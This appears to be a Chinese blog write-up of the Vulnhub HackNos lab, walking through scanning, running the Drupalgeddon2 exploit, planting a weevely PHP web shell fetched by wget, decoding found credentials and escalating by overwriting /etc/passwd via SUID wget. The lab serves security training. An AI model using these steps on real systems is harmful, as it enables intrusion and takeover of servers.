Vulnhub-HackNos-Writeup

最新推荐文章于 2022-03-22 08:56:58 发布
最新推荐文章于 2022-03-22 08:56:58 发布
阅读量384 收藏
点赞数
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41918771/article/details/103528640
版权

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址:

https://drive.google.com/open?id=1IOpXibf-A9iSwoG4IW8HdXFvDBFoy7N1

靶机知识点:

  • nmap
  • weevely
  • passwd
  • openssl
  • wget
  • python

靶机ip:192.168.34.152
kali:192.168.34.80

信息收集

nmap -sV -p 0-65535 192.168.34.152

在这里插入图片描述
看见这两个就知道是web了

dirb http://192.168.34.152

扫个目录看看

在这里插入图片描述

东西还不少,我看了一下,drupal框架。

在这里插入图片描述

whatweb 192.168.34.152/drupal

在这里插入图片描述

漏洞利用

百度了一下drupal 7的漏洞
下载个工具

git clone https://github.com/dreadlocked/Drupalgeddon2.git

进入目录,直接运行。

./drupalgeddon2.rb http://192.168.34.152/drupal

在这里插入图片描述

想写个小马,发现不能写。

在这里插入图片描述

使用weevely生成个小马

weevely generate cmd ./xiaoma.php

在这里插入图片描述
使用python搭建简易服务器,然后通过wget下载。
在这里插入图片描述
连接小马

weevely http://192.168.34.152/drupal/xiaoma.php cmd

在这里插入图片描述

权限提升

在/var/www/html下发现了一个文件
在这里插入图片描述
base64编码

echo KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA== | base64 -d

在这里插入图片描述

解码后是brainfuck,再次解码
https://www.splitbrain.org/services/ook

在这里插入图片描述

得到账号密码,ssh登录不上,python也反弹不tty。
在这里插入图片描述
在这里插入图片描述

看看有没有什么权限

audit_suidsgid -only-suid /

在这里插入图片描述

有wget。准备覆写靶机的/etc/passwd文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用msf,反弹

打开msfconsole。

在这里插入图片描述

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

在这里插入图片描述

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

Bog0n
关注
专栏目录
vulnhub靶机-DC1-Writeup
liuhanzhe的专栏
12-08 1179
vulnhub靶机-DC1-writeup
Vulnhub-Basilic
KAKA的博客
07-10 623
灰常有意思的一次训练,需要对 python 沙箱逃逸有一定程度的理解,让我们开始游戏吧~ [注:从源地址下载出得知需要拿到 4 个 flag] 利用 namp 扫描获取目标 IP 地址:nmap -sn 192.168.67.1/24 继续获取目标的相关开放端口等信息:namp -A -p- 192.168.67.18 可以看到下列信息: http服务对应的端口是 5000 ,而不是 80,其次还开放了 22 --> ssh 服务,我们登陆到 web 页面游玩下~ 点击 contact me,得到
vulhub - Os-hackNos-1
在下小黄的博客
09-09 577
一、环境搭建:Os-hackNos-1靶机 实验主机:kali linux 2021 虚拟机(VM) 实验靶机:Os-hackNos-1靶机(VM) 实验网络:NAT模式 实验难度:简单 flag:1.普通用户的user.txt;2.root用户的user.txt 技能:漏洞利用 | web应用 | 暴力破解 | 权限提升 二、信息收集: 主机发现: 确认自己的信息: ifconfig 探测网段存活主机: nmap -sP 192.168.138.0/24 端口扫描: 探测操作系统及软
VulnHub DC-1 Writeup
末初的CSDN博客
09-28 428
DC-1详情见:https://www.vulnhub.com/entry/dc-1,292/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.102 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 Nmap扫描C段内存活主机 nmap -sP 192.168.56.1/24 如果觉得速度慢了的话可以使用 arp-scan -l 发现目标靶机IP:192.1
Vulnhub-Djinn靶机-Writeup
Vicl1fe的博客
12-03 1274
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/djinn-1,397/ 靶机知识点: arp-scan nmap ftp nc dirsearch 命令执行 python2 input漏洞 主机发现 靶机是ova格式的,可以用Vmware导入,也可以用virtualbox打开。 使用...
vulnhub靶机之Os-hackNos
timesleep的博客
12-13 523
我们的靶机IP为192.168.34.152 kali的IP为192.168.34.175 我们先扫描 我们访问一下80顺带扫一下目录 我们看到有drupal我们先看一下是什么版本 然后我们查了一个exp 好我们把他下载出来 git clone https://github.com/dreadlocked/Drupalgeddon2.git gem install highline ./...
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 245
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
funbox-vulnhub靶机-writeup
Lee
08-14 1623
FunBoxWriteup ##0x00 找到目标主机 使用nmap扫描网段,发现目标 nmap -sn 16.16.16.0/24 //发现目标机器IP为16.16.16.157 nmap -A 16.16.16.157 -v //直接nmap全扫 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 640
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
VulnHub DMV:1 Writeup
末初的CSDN博客
09-29 589
DMV:1详情见:https://www.vulnhub.com/entry/dmv-1,462/ 靶机环境VirtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.104 攻击机环境VMware,桥接模式,桥接至VirtualBox Host-Only网卡,IP为:192.168.56.177 扫描C段内存活主机 arp-scan -l or nmap -sP 192.168.56.1/24 Nmap扫描目标IP,收集信息 nmap -A -Pn -
Vulnhub-Dawn-WriteUp
Vicl1fe的博客
12-04 570
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/sunset-dawn,341/ 靶机知识点: 这里,我靶机的IP为192.168.34.160 我kali的IP为192.168.34.80 信息收集 nmap -sV -p 0-65535 192.168.34.160 dirb htt...
VulnHub DC-2 Writeup
末初的CSDN博客
09-28 400
DC-2详情见:https://www.vulnhub.com/entry/dc-2,311/ 靶机环境VIrtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.103 攻击机环境VMware,桥接模式,桥接至VIrtualBox Host-Only网卡,IP为:192.168.56.177 扫描C段内存活主机 arp-scan -l or nmap -sP 192.168.56.1/24 访问http://192.168.56.103发现被重定向到了
Vulnhub-CLAMP-WriteUp
Vicl1fe的博客
12-05 347
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/clamp-101,320/ 靶机知识点: 信息收集 信息收集得做到位,扫扫端口 nmap -sV p 0-65535 192.168.34.154 发现有22和80端口,22就不说,直接扫目录,这里扫目录废了我特别特别长时间。用dirb...
vulnhub靶机-DC5-Writeup
liuhanzhe的专栏
12-08 201
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-5,314/ DESCRIPTION DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be
VulnHub靶机MILNET:1writeup
xingjinhao123的博客
03-22 462
VulnHub靶机MILNET:1writeup 信息收集 获取IP地址 扫描端口 80端口(没有发现有用信息) 列举目录 只有一个info.php,访问之后发现允许文件包含和网站根目录的路径 经过测试可以通过base64形式执行远程命令注入 getshell 上传大马 msf联动拿shell 提权 查看用户 查看计划任务(这里看到每过一分钟会以root权限执行一次/backup/back..
vulnhub靶机-DC3-Writeup
liuhanzhe的专栏
12-08 349
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-3,312/ DESCRIPTION DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginn
[vulnhub]dusk-Writeup
Vicl1fe的博客
12-23 675
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/sunset-dusk,404/ 靶机知识点: 靶机IP:192.168.34.170 kali IP:192.168.34.69 信息收集 nmap -sS -sV -p- 0-65535 192.168.34.170 端口开的不少。扫...
Vulnhub-MyExpense: 1-Writeup(完)
Vicl1fe的博客
12-16 2036
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/myexpense-1,405/ 靶机知识点: 靶机ip 192.168.34.157 kali ip 192.168.34.80 靶机描述 MyExpense是一个故意存在漏洞的Web应用程序,它使您可以训练如何检测和利用不同的Web漏洞。...
Vulnhub靶机 VULNOS: 2 writeup
xingjinhao123的博客
02-10 3078
下载地址:https://www.vulnhub.com/entry/vulnos-2,147/ 信息搜集 获取IP地址 扫描端口 80端口 点击website跳转到/jabc 在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/ 访问/jabcd0cs/ 在/jabcd0cs/发现CMS的版本,使用searchsploit查询 这里看到了pyload http://[host]/ajax_udf.php?q=1&amp
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bog0n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值